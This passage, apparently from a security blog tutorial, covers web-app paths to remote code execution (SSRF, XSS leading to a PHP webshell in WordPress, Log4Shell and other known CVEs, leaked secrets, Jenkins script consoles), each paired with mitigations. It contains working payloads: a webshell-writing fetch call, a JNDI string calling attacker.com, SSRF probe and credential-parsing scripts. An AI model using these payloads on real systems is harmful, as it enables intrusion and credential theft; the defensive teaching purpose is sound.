and see if the response contains something (like an internal service banner). They may also try common internal IPs (AWS: 169.254.169.254; Docker/K8s: 127.0.0.1 with common ports; or other RFC1918 IPs like 10.x.x.x). Burp Suite can automate this via payloads and detect responses. There are specialized tools like SSRFmap which take a URL parameter and scan for common internal services. Once an interesting internal endpoint is found, the attacker switches to exploration/exploitation mode: for example, if it's AWS metadata, they will request the credentials and then use AWS CLI or Boto3 (Python) scripts with those credentials to see what they can do (list EC2 instances, maybe spawn a new instance with user-data that runs a script, etc.). If it's an internal API, they might interact with it through the SSRF itself, iterating on the crafted requests in a proxy tool such as Burp Repeater. Another technique is blind SSRF detection using out-of-band interaction: e.g., provide http://attacker-server.com (or a Burp Collaborator URL) as the target and see if the attacker's server receives a request (which means the app fetched it). In terms of turning SSRF into RCE, the tools are the same as for normal RCE once you have the foothold: if you retrieved credentials, you might use the aws or gcloud CLI; if you accessed a management API, you use its documented methods or any available exploit scripts. Keep in mind that SSRF exploitation is highly context-specific – you might need to chain multiple steps. For cloud creds, attackers commonly use those keys either to call an API that can run code (like AWS Lambda or AWS SSM) or even to SSH into the very instance (some IAM roles allow retrieving their own key pairs or adding SSH keys).
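The probing workflow can be semi-automated. This sketch only builds the candidate probe URLs; the host/port lists and the `url` parameter name are illustrative guesses, and actually sending the requests is left to curl or a tool like requests:

```python
from itertools import product

# Common internal hosts and ports worth probing through an SSRF parameter;
# the right list depends entirely on the target environment.
HOSTS = ["127.0.0.1", "169.254.169.254", "10.0.0.1"]
PORTS = [80, 443, 6379, 8080, 9200]

def ssrf_candidates(base: str, param: str = "url"):
    """Yield one probe URL per host/port combination."""
    for host, port in product(HOSTS, PORTS):
        yield f"{base}?{param}=http://{host}:{port}/"

candidates = list(ssrf_candidates("http://target.app/fetch"))
# Each candidate would then be requested and its response compared
# against a known-miss baseline to spot reachable internal services.
print(len(candidates))
```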

Mitigation: Preventing SSRF involves both application-level and network-level measures. At the application layer, validate and sanitize any URLs that the application fetches. Avoid allowing arbitrary URLs; implement an allowlist of safe domains that the server truly needs to fetch. For example, if it should only fetch from your company’s API, enforce the domain. Disallow private IP ranges and common metadata IPs in user-supplied URLs (some frameworks or libraries can do SSRF validation). Also, if possible, the fetch function should itself be restricted (for instance, using a proxy that blocks internal addresses). At the network layer, leverage firewall rules: the web server likely doesn’t need to initiate connections to the internal network or to the cloud metadata service — block outbound requests to sensitive internal addresses. For AWS, use IMDSv2 (Instance Metadata Service v2), which requires a token and mitigates simple SSRF access to metadata. In containerized environments, avoid exposing admin ports to the same network as the app if not needed. Essentially, segmentation and egress control can stop an SSRF from reaching juicy targets. Also, monitor outbound traffic from servers — an unexpected call to the metadata IP or internal services could indicate an SSRF attack. By combining strict input rules (only allow URLs to known-good hosts) and network restrictions (no outbound calls to internal-only resources), you greatly reduce SSRF risk.
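A minimal sketch of the application-layer check, using only the standard library. A production implementation must also pin the resolved IP for the actual fetch (connect to the checked address, not the hostname again) to defeat DNS rebinding:

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_url(url: str) -> bool:
    """Reject URLs that point at internal, loopback, or metadata addresses."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        return False
    try:
        # Resolve once; the fetch must then use this same address
        # to avoid DNS rebinding between check and use.
        addr = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
    except (socket.gaierror, ValueError):
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)

print(is_safe_url("http://127.0.0.1/admin"))          # loopback: rejected
print(is_safe_url("http://169.254.169.254/latest/"))  # link-local metadata: rejected
```

An allowlist of known-good hostnames is stricter and preferable where feasible; the denylist approach above is the fallback when arbitrary external URLs must be supported.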

8. Cross-Site Scripting (XSS) as a Path to RCE

Explanation: Cross-Site Scripting is usually a client-side issue (running malicious JavaScript in a victim’s browser). However, in certain scenarios, an attacker can leverage XSS to ultimately achieve code execution on the server. This typically requires a privileged victim, such as an administrator, and an application feature that allows that admin to perform actions leading to RCE. In essence, the attacker uses XSS as a form of remote control of an admin’s browser, which is authenticated to the application, to perform actions that the attacker otherwise couldn’t. For instance, on some platforms (like CMS or cloud management interfaces), an admin can install plugins, modify templates, or access server consoles via the web interface. If the attacker can run JavaScript in the admin’s browser (via XSS), they can automate those admin actions to deploy a webshell or create a new admin account. It’s a less direct method than others, and often requires social engineering (tricking an admin to visit a malicious link or page), but it expands a simple XSS into a full system compromise.

Example scenario: A real-world example is WordPress XSS leading to RCE. WordPress admins can install plugins or edit theme PHP code in the dashboard. Suppose there’s a stored XSS in the comments section of a blog (an attacker posts a comment containing <script>...malicious JS...</script>). When an admin user later views the comments moderation page, the XSS triggers in their browser. The malicious script could, for instance, silently send an HTTP request (using the admin’s cookies) to create a new plugin or edit a theme file to include <?php system($_GET['cmd']); ?>. Concretely, the JS could do:

fetch("/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty", {
  method: "POST",
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  // a real payload would also need the _wpnonce token scraped from the editor page
  body: "newcontent=" + encodeURIComponent("<?php system($_GET['cmd']); ?>")
});

This is an oversimplification, but the idea is that the XSS uses the WordPress admin interface to write a PHP webshell into a theme file. Next, the attacker can directly access that shell on the server. Another scenario: an application's admin panel might have a feature to run backups or diagnostics (perhaps an admin can input a command to execute on the server via a web form). If XSS can simulate an admin filling and submitting that form, it can trigger RCE. Essentially any functionality only available to admins — if reachable via HTTP requests — can potentially be driven by XSS. An Intigriti writeup cited an example where XSS on an admin panel was used to create a new admin account, after which the attacker used that account to upload a web shell.

Tools & Techniques: Achieving RCE via XSS is more situational. First, the attacker needs to find an XSS (using typical techniques: payloads like <script>alert(1)</script> and variations, tested via Burp, etc.). Once a potent XSS is found, the next step is reconnaissance of the admin functionalities. Tools like Burp Proxy and Browser DevTools are useful – the attacker might need to observe what requests are made when an admin performs certain actions (e.g., uploading a plugin, creating a user, etc.). Then they craft JavaScript to replicate those requests. This often involves extracting some CSRF tokens or nonce values from the page – so the XSS payload might first do a GET request to fetch a page, parse out a token, then perform the privileged action with that token. This can all be done in JavaScript. Testing such a payload might be done in a controlled environment (the attacker might use their own admin account on a test instance, for example, to perfect the exploit script). Frameworks like the BeEF (Browser Exploitation Framework) can also control a hooked browser; an XSS can load the BeEF hook, and then the attacker can use BeEF’s modules to drive the admin session to do things like send requests or keystrokes. Ultimately, the “tool” here is the malicious JavaScript itself. It’s often custom, but likely small in size to fit in an XSS vector. One might also use a phishing approach – sending the admin a link to a crafted URL that triggers the XSS (if it’s reflected) – but that crosses into social engineering. Many bug bounty programs consider exploitation via admin XSS as valid if no user interaction beyond viewing is needed (though sometimes they consider it out of scope if it requires convincing an admin). Regardless, for the attacker, the key is carefully constructing the exploit and possibly using the browser’s developer console to test in real time if they have any access.
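The token-extraction step is easy to prototype outside the browser first. This Python sketch mirrors what the eventual JavaScript payload must do: fetch the admin page, scrape the CSRF token/nonce, and attach it to the privileged request. The field name `_wpnonce` follows WordPress convention; the sample HTML is fabricated for illustration:

```python
import re

def extract_nonce(html, field="_wpnonce"):
    """Pull a hidden CSRF token out of an admin page, as the XSS payload would."""
    match = re.search(
        rf'name=["\']{field}["\']\s+value=["\']([0-9a-f]+)["\']', html
    )
    return match.group(1) if match else None

# Simulated fragment of the admin page the payload would have fetched.
sample = '<input type="hidden" name="_wpnonce" value="9f2c1ab4e0" />'
nonce = extract_nonce(sample)
# The payload would then POST the privileged form with this nonce attached.
print(nonce)
```

Once the logic works here, translating it into a compact `fetch(...).then(...)` chain for the actual XSS vector is mechanical.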

Mitigation: Mitigating this chained attack means mitigating XSS in the first place and also following the principle of least privilege in web admin interfaces. To prevent XSS, ensure all user inputs that are reflected in pages are properly encoded, use frameworks that auto-escape by default, and consider Content Security Policy (CSP) to make exploitation harder. For the scenario where XSS could perform powerful actions: ensure critical admin actions have additional controls. For example, creating new admins or editing template code might require re-authentication or high-entropy CSRF tokens that are hard to grab via XSS. Implement CSP such that even if XSS fires, it might not be able to load external scripts or send out requests (CSP can restrict fetch/XHR destinations). Also, segregate duties: maybe the account that moderates comments shouldn’t be the same super-admin that can edit code. In general, defense in depth: fix the XSS, but also assume an XSS could happen and shield sensitive actions (multi-factor confirmations, etc.). Additionally, HttpOnly cookies for session tokens can prevent XSS from directly stealing sessions, but in these cases the script is just making requests, not stealing cookies, so HttpOnly doesn’t stop the abuse. Therefore, focus on content sanitization and robust CSRF protection. From a broader view, training admins not to click suspicious links and using subresource integrity for any loaded scripts can also help, but the root fix is to eliminate XSS vulnerabilities and guard high-impact features.
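As a concrete illustration of the CSP advice, a restrictive policy might be assembled like this. The directive values are an example starting point, not a drop-in policy for any particular site:

```python
# Example CSP: no inline or third-party scripts, and fetch/XHR from any
# injected script is limited to the same origin (connect-src).
csp_directives = {
    "default-src": "'self'",
    "script-src": "'self'",
    "connect-src": "'self'",
    "frame-ancestors": "'none'",
}
csp_header = "; ".join(f"{name} {value}" for name, value in csp_directives.items())
print(csp_header)
# Sent to browsers as: Content-Security-Policy: <csp_header>
```

Note that `connect-src 'self'` does not stop an XSS payload from hitting same-origin admin endpoints, which is exactly the attack above; it mainly hinders exfiltration and loading of external tooling, so it complements rather than replaces fixing the XSS.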

9. Exploiting Vulnerable Components (Third-Party Libraries and Services)

Explanation: Modern web applications rely on a multitude of third-party components: frameworks, libraries, modules, and external services. A remote code execution can often be achieved by exploiting a known vulnerability in one of these components, rather than a mistake in the custom application code. This isn't a "vulnerability class" like the others, but rather a method: find out what software the target is using, and see if any known RCE vulnerabilities exist for those versions. If the target hasn't patched or updated a critical component, an attacker can leverage public exploits (or adapt proof-of-concepts) to execute code. Examples include Log4Shell (CVE-2021-44228) in Log4j, where a simple string in an HTTP header could trigger a JNDI lookup and execute code on any vulnerable server, and the Apache Struts RCE that led to the Equifax breach, where merely sending a crafted Content-Type header exploited a weakness in the Struts framework. Essentially, this method abuses the fact that many organizations run outdated software with known holes.

Example scenario: A bug bounty hunter notices the target website's HTTP response headers reveal it's using Apache Tomcat 8.5.4. A quick search shows that Tomcat version has a known RCE (for example, a deserialization flaw). The hunter obtains a published exploit script (often Python) for that CVE, adjusts the target details, and executes it — gaining a shell on the server. Another scenario: the target has an upload function and the response reveals X-Powered-By: PHP/5.4.0. PHP 5.4.0 is extremely old and might have known exploits (maybe not a straightforward RCE, but perhaps an overflow). Or consider a Java web app using Spring; if it's an old version, the well-known Spring4Shell exploit (CVE-2022-22965) might apply to achieve RCE via data binding. A concrete example from 2021: many companies were hit by Log4Shell. An attacker could simply include ${jndi:ldap://attacker.com/a} in any input that got logged, and if the server was using a vulnerable Log4j library, it would fetch and execute the attacker's code (via LDAP). The attacker in that case doesn't exploit a bug in the app's logic, but rather in a component the app uses.

Another example: an application running Drupal 7.x — Drupal had a famous RCE (Drupalgeddon) where an attacker could call PHP functions via a crafted request. If the site wasn’t patched, the attacker just needs to send that known payload. Similarly, something like a JBoss server with a known JMX console exploit, or an outdated WordPress plugin with RCE. Attackers will research the tech stack (via headers, URLs, or even asking the app “what version are you?” through error messages) and then choose an exploit from databases like Exploit-DB.
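For the Log4Shell example above, the publicly documented probe was nothing more than the JNDI string placed in a field the server logs. This sketch just assembles such a probe; the callback domain is a placeholder for an out-of-band detection server, and sending it anywhere requires authorization:

```python
# Classic Log4Shell probe: the string itself is the exploit. Any logged
# header or parameter will do. Only test systems you are authorized to test.
CALLBACK = "attacker-oob.example"  # placeholder OOB server under your control
payload = "${jndi:ldap://" + CALLBACK + "/a}"

headers = {
    "User-Agent": payload,
    "X-Api-Version": payload,  # another header commonly logged by backends
}
print(headers["User-Agent"])
```

A DNS or LDAP lookup arriving at the callback server confirms the vulnerability without executing anything on the target.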

Tools & Techniques: The process often starts with reconnaissance: using tools like Nmap with version detection, WhatWeb, Wappalyzer, or simply examining HTTP headers and page source to identify software and versions. Once identified, checking vulnerability databases (CVE lists, Exploit-DB, etc.) for RCEs in those versions is next. Tools like searchsploit (part of Exploit-DB) can quickly show if an exploit is available locally. There are also automated scanners like Nuclei which have templates for known vulns (you can run a nuclei template for, say, “Tomcat CVE-2020-xyz” against the target). If an exploit exists and is not directly usable, the attacker might modify a proof-of-concept or use Metasploit modules. Metasploit has a wide range of RCE exploits for known CVEs; for example, the hunter might load exploit/multi/http/struts_dmi_exec for an Apache Struts RCE and fire it at the target. For less straightforward cases, an attacker might need to compile code or use curl and other tools to manually reproduce the HTTP requests described in an advisory. In the Log4Shell case, a simple command was enough (and maybe setting up a malicious LDAP server using a tool like marshalsec to serve the payload). Essentially, this approach leverages publicly available exploits – so the “tool” is whatever the exploit is written in (often Python, or a JAR for Java deserialization exploits, etc.). The attacker may also use vulnerability scanners (like Nessus, OpenVAS) in an engagement to find unpatched issues. A key aspect is version detection; sometimes the app hides version info, so attackers might use side-channels (default file paths, behavior, or known responses) to infer versions. Once they confirm a vulnerable version, they execute the attack script and hopefully get a shell.
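The banner-to-version step can be scripted. This sketch parses a typical Server header and flags versions older than a known-fixed release; the product names and thresholds are illustrative, whereas a real check would consult a CVE feed or run searchsploit/Nuclei:

```python
import re

def parse_banner(banner):
    """Split a banner like 'Apache Tomcat/8.5.4' into (name, version tuple)."""
    match = re.match(r"(.+)/([\d.]+)$", banner.strip())
    if not match:
        return None
    name, version = match.groups()
    return name, tuple(int(part) for part in version.split("."))

# Illustrative "fixed in" thresholds; not a real vulnerability database.
FIXED_IN = {"Apache Tomcat": (8, 5, 51)}

def looks_vulnerable(banner):
    parsed = parse_banner(banner)
    if not parsed:
        return False
    name, version = parsed
    fixed = FIXED_IN.get(name)
    return fixed is not None and version < fixed

print(looks_vulnerable("Apache Tomcat/8.5.4"))
```

Tuple comparison handles the version ordering correctly ((8, 5, 4) sorts before (8, 5, 51)), which naive string comparison would get wrong.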

Mitigation: The straightforward but challenging solution is to stay up-to-date with patches and updates. Organizations must keep track of the components they use (inventory) and monitor for security advisories. Applying updates or security patches promptly closes these known holes. Where immediate patching isn't possible, use virtual patches or WAF rules to mitigate known exploit patterns (e.g., after Log4Shell, WAFs deployed rules to block ${jndi: strings). Additionally, design defense-in-depth: if your app server has a known RCE, having proper network segmentation, host-based firewalls, and least privilege can limit damage (for example, running web servers as non-root, so an RCE doesn't instantly mean root access). Dependency management is critical: use tools (like OWASP Dependency-Check, npm audit, etc.) to identify vulnerable libraries in your application and update them. Disable or remove unnecessary components – for instance, if a Tomcat installation isn't using the AJP connector, disable it (there was an RCE via AJP in 2020). Employing an allowlist for outbound traffic can also stop some exploits (like preventing a component from downloading payloads). Finally, monitor public disclosures and have an incident response plan; many RCEs are exploited in the wild within days of disclosure, so speed is of the essence. By keeping systems patched and minimizing the window of exposure, you prevent attackers from simply using yesterday's exploits on your apps.

10. Sensitive Data Exposure & Misconfigurations Leading to RCE

Explanation: Sometimes the easiest path to RCE is not through a code vulnerability, but through leaked credentials or misconfigurations. Sensitive data exposure refers to things like hardcoded passwords, API keys, private keys, or other secrets being unintentionally accessible. If an attacker finds such credentials, they might log in to an admin interface or service and directly execute code (or use features to upload code). Similarly, misconfigurations such as default admin passwords left unchanged, or debug modes left enabled in production, can grant an attacker administrative access. Once an attacker has admin-level access to an application or system, achieving RCE is often trivial (they can just use the system as intended to run commands or upload code). In a web app context, this might mean using an exposed SSH key to SSH into the server, using a leaked database password to connect and then using stored procedures to run OS commands, or accessing an open cloud management portal. Essentially, the attacker isn’t exploiting a “bug” in code but rather taking advantage of information or access that was mistakenly made available.

Example scenario (Credential leak): A common example is finding a GitHub repository (or a publicly exposed .env/config file on the server) that contains secrets, say the application’s .env file with AWS_ACCESS_KEY and AWS_SECRET_KEY, or a database URL with username and password. If an attacker obtains AWS keys that belong to the web app’s account, they could use those keys with AWS CLI to, for instance, start an EC2 instance under that account (for persistence), or more directly, use AWS Systems Manager to send commands to the running server (if it’s registered), or pull sensitive data from S3. If they get a DB password and the DB is accessible, they might connect and then use the SQL-to-RCE techniques mentioned earlier. Another scenario: an attacker finds a backup file like website_backup.zip on the web server (maybe via LFI or a careless backup in the web root) and inside it finds configuration with admin credentials. Using those, they log in to the web admin panel and from there use a feature to execute code (some CMS have “module upload” or “template edit” features that essentially let you run code).
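Checking whether a recovered config file actually contains usable cloud keys is a one-minute script. This sketch parses dotenv-style lines and flags AWS-shaped values; the `AKIA` + 16 characters pattern is AWS's documented access-key-ID format, and the file content below is fabricated for illustration (AKIAIOSFODNN7EXAMPLE is AWS's own documentation example key):

```python
import re

# AWS access key IDs start with AKIA followed by 16 uppercase alphanumerics.
AWS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

def parse_env(text):
    """Parse KEY=value lines from a dotenv-style file into a dict."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"')
    return env

leaked = 'DB_URL="postgres://app:hunter2@10.0.0.5/db"\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n'
env = parse_env(leaked)
hits = [key for key, value in env.items() if AWS_KEY_RE.search(value)]
print(hits)
```

A confirmed key would then be tried with the AWS CLI or Boto3 to enumerate what the credential can reach.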

Example scenario (Misconfigurations/defaults): An example is leaving an admin interface unprotected. For instance, a framework's debug mode left on in production is dangerous: Django's debug pages leak settings and stack traces, and the Werkzeug interactive debugger used by Flask provides an in-browser Python console. If the latter is accessible in production, an attacker can often execute code on the server through it. Another example: Jenkins, a popular CI tool, has a script console that allows running arbitrary Groovy code on the server. If a Jenkins instance is network-accessible without proper auth (or with default creds), an attacker can just navigate to it and run println "Executing shell"; "whoami".execute() to get RCE. Default passwords are another classic: many appliances and admin panels ship with creds like admin/admin. If those aren't changed, the attacker just logs in and uses the interface normally to get RCE (e.g., on a network device with a web interface, they might enable SSH/telnet through the panel). In the cloud, a misconfiguration might be leaving an AWS Lambda function with overly broad permissions such that an attacker triggering it (via a webhook) can write to an EC2 instance's user-data and cause code execution. The possibilities are endless, but the unifying theme is that the attacker didn't hack code; they found a key or a door that was left open.

Tools & Techniques: Finding leaked sensitive data often involves scanning code repos and the application for clues. Tools like truffleHog, GitLeaks, or even GitHub’s own secret scanning can find API keys or passwords in repositories. Attackers also use Google dorks or site-specific searches to find env files or backup dumps (site:target.com ext:env or looking for “password” in leaked files). On the running application, they might try common paths: /config.php.old, /backup.sql, or use directory brute-forcing (ffuf/gobuster) to find hidden files. For misconfigurations, port scanning with Nmap could reveal services like Redis with no auth or an open management port. Also, simply trying default creds on known admin portals (e.g., try admin/admin on /admin) is part of a pentester’s playbook. Tools like wpscan can enumerate users in WordPress and attempt default or weak passwords. If an SSH key is leaked, an attacker uses ssh to try logging in to the server. If a private key is found, they check if passwordless login is enabled for that key’s matching public key on any server. Once in (through SSH or admin web login), they effectively have RCE by using the system normally. For example, using a cloud API key: the attacker will configure AWS CLI with the key and run commands like aws ec2 describe-instances or aws ssm send-command to execute a command on all instances. Another example, if they find a Docker API port open (say port 2375 without auth), using docker CLI or curl they can deploy a new container (perhaps mounting the host filesystem) and achieve execution. Many such misconfig tools exist; for example kube-hunter for Kubernetes open dashboards, etc. In summary, the attacker’s “tool” is whatever the legitimate access method is (SSH client, cloud CLI, web login) once they have the credential or find the open door.
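The "common paths" step can be scripted as a lightweight complement to ffuf/gobuster. The wordlist below just echoes the examples from the text; real wordlists such as SecLists are far larger, and actually requesting the URLs needs authorization:

```python
# Files frequently left behind in web roots (examples from the text only).
COMMON_LEFTOVERS = [
    "/.env",
    "/config.php.old",
    "/backup.sql",
    "/website_backup.zip",
]

def probe_urls(base_url):
    """Build the full URLs to request; a 200 on any of them deserves a look."""
    base = base_url.rstrip("/")
    return [base + path for path in COMMON_LEFTOVERS]

for url in probe_urls("http://target.app/"):
    print(url)
```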

Mitigation: Protect your secrets and lock down configurations. Practically: never hardcode credentials or API keys in public code. Use environment variables or secret management services, and even then, don’t expose those via the app (ensure that .env or config files aren’t accessible from the web root). Implement proper access controls: no admin panels should be accessible without authentication, and ideally not accessible from the public internet at all. Change default passwords on all systems and enforce strong, unique passwords. Disable or secure debug and management interfaces – for instance, disable debug mode in production, require authentication for any admin console, and if possible, bind such services to localhost or a secure network. Use network segmentation: databases and internal tools should not be reachable from the outside world. Employ principle of least privilege for credentials: if an app only needs read access to an S3 bucket, don’t give it full AWS admin rights – that way even if keys leak, the damage is limited. Regularly scan your own infrastructure for open ports and services (using tools like Nmap) and review those. Monitor repositories (through automated scanning or Git hooks) to prevent committing secrets. Many cloud providers offer tools to detect exposed keys or config issues (e.g., AWS GuardDuty/Macie can detect if credentials appear on the internet). In short, be vigilant about any secret or admin functionality: assume attackers will find any secret that is available and will try common credentials. By keeping secrets safe, rotating keys regularly, and securing administrative access, you cut off an entire class of “easy RCE” that comes from misconfiguration rather than code exploitation.
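The least-privilege advice can be made concrete. This sketch shows, as a Python dict in the shape of an AWS IAM policy document, a role limited to reading one bucket, so that leaked keys cannot be parlayed into instance control; the bucket name is a placeholder:

```python
import json

# Scoped-down policy: read-only access to a single bucket, nothing else.
# If these credentials leak, the blast radius is one bucket's contents.
policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": [
                "arn:aws:s3:::example-app-assets",
                "arn:aws:s3:::example-app-assets/*",
            ],
        }
    ],
}
print(json.dumps(policy, indent=2))
```

Contrast this with an `"Action": "*"` policy on the same role: with the scoped version, stolen keys yield some static assets; with the wildcard, they yield the account.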

Conclusion: Remote Code Execution is the ultimate prize for attackers on a web application, and as we’ve seen, there are many roads that lead there. We covered direct injection flaws (OS commands, SQL, template engines), file upload and inclusion tricks, logic flaws like deserialization, leveraging SSRF, social-engineering-assisted XSS attacks, and the importance of keeping software updated and configs tight. For each technique, understanding how to test and exploit it (ethically, in a controlled environment or engagement) helps defenders know what to protect against. The common thread is untrusted input or access leading to unintended execution of code — break that thread by validating input, reducing privileges, and patching known holes. By learning these techniques, penetration testers and bug hunters can improve their skills in finding critical RCE bugs, and developers can proactively harden their applications against them. Remember, the best offense is a good defense: knowing how these attacks work is the first step to preventing them. Stay safe and happy hacking!

Stay ethical, don’t be a fool. Let’s connect on LinkedIn!
